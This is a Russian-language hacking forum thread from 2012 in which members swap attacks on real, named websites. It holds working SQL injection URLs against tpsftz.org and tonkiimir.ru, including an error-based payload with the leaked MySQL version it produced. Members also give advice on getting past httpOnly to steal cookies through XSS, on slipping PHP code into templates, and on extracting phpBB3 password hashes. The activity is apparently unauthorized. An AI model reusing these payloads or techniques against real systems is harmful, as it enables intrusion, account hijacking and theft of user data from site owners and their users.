
16.07.2012, 20:13
|
|
Участник форума
Регистрация: 08.09.2011
Сообщений: 137
С нами:
7725206
Репутация:
26
|
|
2aydin-ka
Сообщение от None
http://www.tpsftz.org/page.php?cat=5&subcat=-107'+union(select+1,2,3,4,5,6,7,8,9,user(),11,12,1 3)+--+
|
|
|

16.07.2012, 20:48
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами:
11322426
Репутация:
0
|
|
Сообщение от jasp3r
в модуле блогов на phpbb нашел xss(пасивку), но почему-то кроме настроек чата и phpsession больше ничего на сниффер не приходит.
httpOnly запрещает чтение Cookie через JS.
|
|
|

16.07.2012, 20:52
|
|
Познающий
Регистрация: 23.04.2012
Сообщений: 44
С нами:
7396886
Репутация:
0
|
|
Сообщение от M_script
httpOnly запрещает чтение Cookie через JS.
Спасибо, а есть возможность обойти это?
|
|
|

16.07.2012, 20:54
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами:
11322426
Репутация:
0
|
|
Сообщение от HeBepHyCb
Вот нашел я активную XSS-ку ...но меня не интересуют куки ....мне до корней сайта охота добраться, до базы и всего прочего.
XSS выполняется на стороне клиента. Выполнить код на сервере непосредственно через эту уязвимость нельзя.
|
|
|

16.07.2012, 20:59
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами:
11322426
Репутация:
0
|
|
Сообщение от jasp3r
Спасибо, а есть возможность обойти это?
1) Метод TRACE
2) Уязвимость веб-сервера
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0053
3) Плагины браузера
http://seckb.yehg.net/2012/06/xss-gaining-access-to-httponly-cookie.html
|
|
|

16.07.2012, 21:35
|
|
Познающий
Регистрация: 23.04.2012
Сообщений: 44
С нами:
7396886
Репутация:
0
|
|
Сообщение от M_script
1) Метод TRACE
2) Уязвимость веб-сервера
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0053
3) Плагины браузера
http://seckb.yehg.net/2012/06/xss-gaining-access-to-httponly-cookie.html
Буду пробовать.
Еще в этом phpbb нашел такую штуку, в настройках юзера, там где формат даты вручную можно вводить, ввожу "> - выдает ошибку mysql:
SQL ERROR [ mysql4 ]
Data too long for column 'user_dateformat' at row 1 [1406]
при этом дата на форуме выглядит теперь вот так
Можно ли раскрутить до уязвимости?
Стоит там еще ajax chat у них, файл install не удалили, но максимум что с его помощью можно сделать, это выкинуть всех из чата, может я что-то еще не попробовал? Подсобите
|
|
|

16.07.2012, 21:39
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от jasp3r
Буду пробовать.
Еще в этом phpbb нашел такую штуку, в настройках юзера, там где формат даты вручную можно вводить, ввожу "> - выдает ошибку mysql:
SQL ERROR [ mysql4 ]
Data too long for column 'user_dateformat' at row 1 [1406]
при этом дата на форуме выглядит теперь вот так

Можно ли раскрутить до уязвимости?
Еще в репутации, похоже нифига не фильтруется, но и вывода там видимо нет:
http://tonkiimir.ru/reputation.php?u=-1+UNION+SELECT+1
Стоит там еще ajax chat у них, файл install не удалили, но максимум что с его помощью можно сделать, это выкинуть всех из чата, может я что-то еще не попробовал? Подсобите
Код:
http://tonkiimir.ru/reputation.php?u=3+or(1)group+by(concat(version(),0x00,floor(rand(0)*2)))having(min(0)or(1))--+
Duplicate entry ' 5.1.58-1ubuntu1-log' for key 'group_key' [1062]
|
|
|

16.07.2012, 22:56
|
|
Новичок
Регистрация: 12.07.2008
Сообщений: 0
С нами:
9384704
Репутация:
0
|
|
Сообщение от M_script
XSS выполняется на стороне клиента. Выполнить код на сервере непосредственно через эту уязвимость нельзя.
Ок, тогда не подскажете, как обойти фильтрацию такого рода:
Пишу сохраняется как
Если пишу <? phpinfo() ?> то сохраняется в исходном коде точно так же, а выводится на странице нормально т.е. , но не исполняется (( Как же тогда его туды вставить ?
|
|
|

17.07.2012, 00:32
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами:
8814194
Репутация:
0
|
|
1. Выключена обработка РНР в файлах где Вы пытаетесь его вставить.
2. short_open_tag = off
3. Попробуйте варианты {php}{/php}, ну и тому подобные, в некоторых шаблонах проходят такие варианты кода! Да и убедитесь, что тот кусок куда Вы вставляете код, не выводится системой через echo... Боюсь потому у вас и идет вывод на страницу кода РНР!
P.S. Вариантов куда больше, думайте не много и сами...
|
|
|

17.07.2012, 01:07
|
|
Познающий
Регистрация: 23.04.2012
Сообщений: 44
С нами:
7396886
Репутация:
0
|
|
в phpbb3 хэш 34 символа(вместе с $H$) в моем случае вывод максимум 31 символ
можно ли как-то сделать, чтобы выводило после 3го символа, т.е. без $H$ ?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|